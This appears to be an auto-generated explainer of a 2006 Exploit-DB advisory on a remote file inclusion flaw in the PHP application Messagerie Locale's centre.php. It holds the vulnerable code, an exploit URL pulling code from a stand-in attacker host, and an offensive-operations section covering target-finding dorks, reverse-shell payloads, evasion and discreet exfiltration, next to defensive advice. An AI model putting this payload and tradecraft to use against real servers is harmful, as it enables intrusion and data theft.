By exploitdb papers bot•November 23, 2006•

papers

Messagerie Locale 'centre.php' Remote File Inclusion Explained

What this paper is

This paper describes a Remote File Inclusion (RFI) vulnerability in a web application called "Messagerie Locale". The vulnerability exists in the centre.php file, which is part of the application. The author, DaDIsS, explains how an attacker can exploit this flaw to include and execute arbitrary files from a remote server, potentially leading to code execution on the victim's web server.

Simple technical breakdown

The core of the vulnerability lies in how the centre.php script handles user input. It takes a parameter named page from the URL. If this page parameter is provided, the script uses its value to include another PHP file. The problem is that the script doesn't properly sanitize or validate the page parameter. This allows an attacker to provide a URL pointing to a malicious file on their own server instead of a local file. When the script includes this remote file, it effectively executes the attacker's code on the victim's server.

Complete code and payload walkthrough

The paper provides a snippet of the vulnerable PHP code:

<?
   if(isset($_GET['page']))
  {
       $page=$_GET['page'];
  }
   else
  {
      $page="";
  }

   if (empty($page)||!isset($page))
  {
        include("accueil.php");
  }
   else
  {
       include($page.".php");
  }

 ?>

Let's break this down:

<? ... ?>: These are PHP opening and closing tags, indicating that the enclosed code is to be interpreted as PHP.
if(isset($_GET['page'])) { ... } else { ... }:
- isset($_GET['page']): This checks if a variable named page has been set in the URL's query string (e.g., ?page=something).
- $page=$_GET['page'];: If page is set, its value is assigned to the PHP variable $page.
- $page="";: If page is not set, the $page variable is initialized as an empty string.
if (empty($page)||!isset($page)) { ... } else { ... }: This is the crucial part for the vulnerability.
- empty($page): Checks if the $page variable is considered empty (e.g., "", 0, "0", null, false, empty array).
- !isset($page): Checks if the $page variable is not set. This condition is technically redundant here because the else block of the previous if statement ensures $page is always set (either to a value from $_GET or an empty string).
- include("accueil.php");: If $page is empty or not set, the script includes a local file named accueil.php. This is the default behavior when no page parameter is provided.
- include($page.".php");: This is where the RFI occurs. If $page is not empty, the script attempts to include the file specified by $page followed by the .php extension.

Mapping of code fragments to practical purpose:

isset($_GET['page']): Detects if the attacker is trying to control the page parameter.
$page=$_GET['page'];: Captures the attacker's input for the page parameter.
include($page.".php");: The vulnerable function that directly includes content based on user input, leading to RFI.

Payload/Exploit Example:

The paper provides an example URL: http://www.victime.com/(path)/centre.php?page=http://attacker

http://www.victime.com/(path)/centre.php: This is the target URL pointing to the vulnerable script on the victim's server.
?page=http://attacker: This is the malicious input.
- page=: The parameter name being manipulated.
- http://attacker: The attacker's controlled URL.

When this URL is accessed, the PHP code will execute include("http://attacker.php");. If the attacker has set up a server at http://attacker that serves a file named attacker.php (or if the server is configured to interpret http://attacker as a PHP file), the content of that remote file will be fetched and executed by the victim's PHP interpreter.

Practical details for offensive operations teams

Required Access Level: Low. This is a web-based vulnerability, typically exploitable by any user who can send HTTP requests to the vulnerable web application. No prior authentication or elevated privileges on the web server are usually required.
Lab Preconditions:
- A target web server running PHP.
- The "Messagerie Locale" application (or a similar application with the same vulnerable centre.php code) installed and accessible via HTTP.
- An attacker-controlled server (e.g., a VPS, a cloud instance) capable of serving arbitrary files via HTTP. This server will host the malicious PHP payload.
- The attacker's server must be accessible from the target's network.
Tooling Assumptions:
- A web browser for manual testing and reconnaissance.
- An HTTP proxy (like Burp Suite or OWASP ZAP) for intercepting and modifying requests.
- A simple HTTP server (like Python's http.server or Nginx) on the attacker's machine to serve the payload.
- A tool for generating PHP shellcode (e.g., Metasploit's php/meterpreter/reverse_tcp payload, or custom PHP webshells).
Execution Pitfalls:
- File Extension Handling: The exploit relies on include($page.".php");. If the attacker's payload is not named attacker.php (e.g., it's shell.txt), they might need to adjust their URL to http://attacker/shell.txt?.php or similar techniques to bypass the .php append. Some web servers might also block direct inclusion of remote URLs.
- allow_url_fopen Directive: The PHP allow_url_fopen directive must be enabled on the victim's server for include() to fetch remote files. If this is disabled, RFI will not work, and the exploit will likely fail or only include local files.
- Firewall/Network Restrictions: The victim's server might have outbound firewall rules preventing it from connecting to the attacker's server.
- Input Filtering/WAF: A Web Application Firewall (WAF) might detect and block requests containing URLs in the page parameter.
- Payload Execution: The included file must contain valid PHP code that can be executed. If the attacker includes a non-PHP file or invalid PHP, it might be displayed as text or cause a PHP parse error.
- Path Traversal vs. RFI: The code snippet include($page.".php"); is susceptible to RFI. If the intention was to include local files and the application only allowed local paths, then path traversal (../../) might be a separate vulnerability, but RFI specifically targets the ability to include remote URLs.
Tradecraft Considerations:
- Reconnaissance: Identify the target application and version. Use search engines (like Google dorks mentioned in the paper: inurl:indexmess.php) to find potential targets.
- Payload Hosting: Ensure the attacker's server is stable and can serve the payload quickly and reliably.
- Obfuscation: If WAFs are suspected, consider basic obfuscation techniques for the payload URL or the payload itself, though this specific exploit is quite direct.
- Post-Exploitation: Once a shell is obtained, maintain persistence, escalate privileges, and exfiltrate data discreetly.

Where this was used and when

Context: This vulnerability was described in 2006. At that time, RFI was a common and potent vulnerability in PHP web applications. Applications that didn't properly validate user input used in file inclusion functions were widespread.
Approximate Years/Dates: The paper was published on 2006-11-23. This type of vulnerability was prevalent in the mid-2000s and continued to be a significant threat until developers became more aware and implemented better input validation and security configurations.

Defensive lessons for modern teams

Input Validation is Paramount: Never trust user input. Always validate and sanitize any data received from external sources, especially when it's used in file operations, database queries, or command execution.
Disable allow_url_fopen and allow_url_include: For most web applications, there is no legitimate reason for PHP to open remote URLs. Disabling allow_url_fopen in php.ini prevents include(), require(), fopen(), etc., from accessing remote files. allow_url_include specifically prevents include() and require() from including remote files, but disabling allow_url_fopen is a broader security measure.
Use Whitelisting: Instead of trying to blacklist potentially dangerous inputs, use a whitelist approach. Define exactly which files or paths are allowed to be included and reject everything else.
Secure Configuration: Regularly review PHP and web server configurations to ensure security best practices are followed.
Web Application Firewalls (WAFs): While not a silver bullet, WAFs can help detect and block common attack patterns like RFI. However, they should be used as a defense-in-depth measure, not as the primary security control.
Regular Patching and Updates: Keep all web applications and their underlying frameworks/libraries updated to patch known vulnerabilities.

ASCII visual (if applicable)

+-----------------+       +----------------------+       +--------------------+
| Attacker Server | ----> | Victim Web Server    | ----> | Victim PHP Process |
| (e.g., attacker)|       | (e.g., www.victime.com)|       | (running centre.php)|
+-----------------+       +----------------------+       +--------------------+
        ^                                                        |
        | Serves malicious                                       | Receives and
        | PHP file (e.g.,                                        | includes the
        | attacker.php)                                          | remote file
        |                                                        |
        +--------------------------------------------------------+

Explanation of the visual:

The diagram shows the flow of an RFI attack. The attacker's server hosts a malicious PHP file. The victim's web server receives an HTTP request that targets the centre.php script with a page parameter pointing to the attacker's server. The victim's PHP process, running centre.php, then makes an outbound HTTP request to fetch the malicious file from the attacker's server and executes it as if it were a local file.

Source references

Paper ID: 2832
Paper Title: Messagerie Locale - 'centre.php' Remote File Inclusion
Author: DaDIsS
Published: 2006-11-23
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/2832
Raw Exploit URL: https://www.exploit-db.com/raw/2832

Original Exploit-DB Content (Verbatim)

#===================================================================================#
#
# Messagerie Locale => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Messagerie Locale
# Url : http://dvmet.free.fr/script/messagerie.zip
# Dork : inurl:indexmess.php
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation : 
#
#
# The flaw resides in centre.php file that contain this code :
# 
# <?
#    if(isset($_GET['page']))
#   {
#        $page=$_GET['page'];
#   }
#    else
#   {
#       $page="";
#   }
#
#    if (empty($page)||!isset($page))
#   {
#         include("accueil.php");
#   }
#    else
#   {
#        include($page.".php");
#   }
#
#  ?>
#
#===================================================================================#
#
# Example : 
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / dadiss@virtuaplanet.net
# Proud to be a Moroccan !
#
#===================================================================================#

# milw0rm.com [2006-11-23]